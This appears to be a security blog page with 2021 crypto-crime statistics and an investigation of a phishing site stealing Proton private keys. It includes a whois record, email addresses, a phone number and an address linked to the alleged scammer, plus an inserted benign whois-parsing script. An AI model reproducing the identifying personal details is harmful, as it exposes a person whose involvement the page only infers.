Conti was the biggest ransomware strain by revenue in 2021, extorting at least $180 million from victims.

Believed to be based in Russia, Conti operates using the ransomware-as-a-service (RaaS) model, meaning Conti’s operators allow affiliates to launch attacks using its ransomware program in exchange for a fee.

Malware and cryptocurrency summarized

The report said: “Malware refers to malicious software that carries out harmful activity on a victim’s device, usually without their knowledge. Malware-powered crime can be as simple as stealing information or money from victims, but can also be much more complex and grand in scale. For instance, malware operators who have infected enough devices can use those devices as a botnet, having them work in concert to carry out distributed denial-of-service (DDOS) attacks, commit ad fraud, or send spam emails to spread the malware further.”

Sample of malware strains by number of cryptocurrency transfers from victims | 2021

More than $3 billion stolen in 2021 as DeFi thefts leap 1,330%

Report says: “2021 was a big year for digital thieves. Throughout the year, $3.2 billion in cryptocurrency was stolen from individuals and services — almost 6x the amount stolen in 2020.”

Total value stolen by type of attack | 2019–2021

Rug pulls are the latest innovation in scamming

Rug pulls have emerged as the go-to scam of the DeFi ecosystem, accounting for 37% of all cryptocurrency scam revenue in 2021, versus just 1% in 2020.

All in all, rug pulls took in more than $2.8 billion worth of cryptocurrency from victims in 2021.

Top 15 rug pulls by cryptocurrency value stolen | 2021

Always be cautious while opening attachments or links, never share sensitive information, back up your files, use antivirus and follow our blog for more security knowledge.


Another day, another scammer, but this time a hacked one

The rise in popularity of cryptocurrencies has encouraged cybercriminals to find innovative ways to attack markets, users and any structure where cryptocurrencies are stored. Put simply, if an attacker is able to exploit some part of a chain, smart contract or exchange, or to withdraw cryptocurrency illegitimately, it is deemed a hack or theft. Scammers around the world took home a record $14 billion in cryptocurrency in 2021.

A couple of weeks ago we published an article, Investigation of websites and Telegram groups that are stealing private keys; in case you missed it, read it and learn how to recognize and avoid phishing websites.

Let’s begin…

Everything started with another scam group promoting a non-existent giveaway from Proton. The link led us to a phishing website that tries to steal private keys from Proton users.

Never click on suspicious or malicious links; when you click on unverified links or download suspicious apps you increase your risk of exposure to malware.

When we submitted a request (using a dummy key), the page called a PHP file (access.php) that stored the submitted data somewhere on the server.

Luckily this scammer had misconfigured the server, which allowed us to list its files (directory listing).

A file named “_AbangMiun27_.txt” contained all the sensitive information, including private keys, IP addresses and timestamps.

We checked the private keys to find which accounts they belonged to. Converting them from the PVT_K1 format to the older EOS format let us derive the corresponding public keys (PUB_K1) and look the accounts up; luckily none of the accounts held any funds and there were no transfers.

We strongly advise all users who entered their private keys there to change them. Soon we will publish an article on how to change OWNER and ACTIVE keys.

Scammer IP address:

whois 36.69.126.151

inetnum:        36.69.112.0 - 36.69.127.255
descr:          PT TELKOM INDONESIA
descr:          STO Gambir 3rd Floor
descr:          Jl. Medan Merdeka Selatan No. 12
descr:          Jakarta 10110
country:        ID
admin-c:        AR165-AP
tech-c:         HM444-AP
abuse-c:        AI598-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-TELKOMNET
mnt-irt:        IRT-IDTELKOM-ID
last-modified:  2021-01-26T22:06:47Z
source:         APNIC
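Turning the record above into something an abuse report can be built from, as an added example that is not part of the original post: a parser for the key/value (RPSL-style) whois format, a check that the queried IP really falls inside the inetnum range, the equivalent CIDR, and the abuse-contact and IRT handles to follow up on. The sample input is the APNIC record printed above; nothing else is assumed.

```python
import ipaddress
import re

# The APNIC record shown above, used here as the sample input.
WHOIS_TEXT = """\
inetnum:        36.69.112.0 - 36.69.127.255
descr:          PT TELKOM INDONESIA
descr:          STO Gambir 3rd Floor
descr:          Jl. Medan Merdeka Selatan No. 12
descr:          Jakarta 10110
country:        ID
admin-c:        AR165-AP
tech-c:         HM444-AP
abuse-c:        AI598-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-TELKOMNET
mnt-irt:        IRT-IDTELKOM-ID
last-modified:  2021-01-26T22:06:47Z
source:         APNIC
"""


def parse_whois(text: str) -> dict:
    """RPSL-style 'key: value' lines; repeated keys (descr) become lists."""
    rec = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][\w-]*):\s*(.*)$", line)
        if m:
            rec.setdefault(m.group(1).lower(), []).append(m.group(2).strip())
    return rec


def inetnum_range(rec: dict):
    # Tolerate a hyphen or an en dash between the two addresses.
    lo, hi = re.split(r"\s*[-\u2013]\s*", rec["inetnum"][0])
    return ipaddress.ip_address(lo), ipaddress.ip_address(hi)


def first(rec: dict, key: str) -> str:
    return rec.get(key, [""])[0]


def summarise(ip: str, text: str) -> dict:
    rec = parse_whois(text)
    lo, hi = inetnum_range(rec)
    addr = ipaddress.ip_address(ip)
    return {
        "ip": ip,
        "in_range": lo <= addr <= hi,
        "cidr": [str(n) for n in ipaddress.summarize_address_range(lo, hi)],
        "org": first(rec, "descr"),
        "country": first(rec, "country"),
        "abuse_contact": first(rec, "abuse-c"),  # handle to resolve for the abuse mailbox
        "irt": first(rec, "mnt-irt"),            # incident response team object
        "source": first(rec, "source"),
    }


if __name__ == "__main__":
    print(summarise("36.69.126.151", WHOIS_TEXT))
```

The abuse-c and mnt-irt values are object handles, not mailboxes; a second whois lookup on the handle (whois -h whois.apnic.net AI598-AP) returns the address to write to. An IP from a residential ISP range like this one identifies the network, not the person, so treat it as a lead rather than as attribution.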

Two email accounts were associated with this scam:

  • cimolly07@gmail.com
  • abangmiun27@gmail.com

Admin Email: cimolly07@gmail.com
Registry Tech ID: Not Available From Registry
Tech Name: Ollie N/A
Tech Organization:  
Tech Street: jl,sudirman jl,sudirman  
Tech City: jakarta
Tech State/Province: DKI JAKARTA
Tech Postal Code: 56784
Tech Country: ID
Tech Phone: +62.82283737512
Tech Phone Ext:  
Tech Fax:  
Tech Fax Ext:  
Tech Email: cimolly07@gmail.com
Name Server: ns1.domosquare.com
Name Server: ns2.domosquare.com

Remember, there are more sophisticated attacks and scams out there, so act responsibly and carefully.

Learn how to back up your WebAuth private key, and remember never to share your private key with anyone else.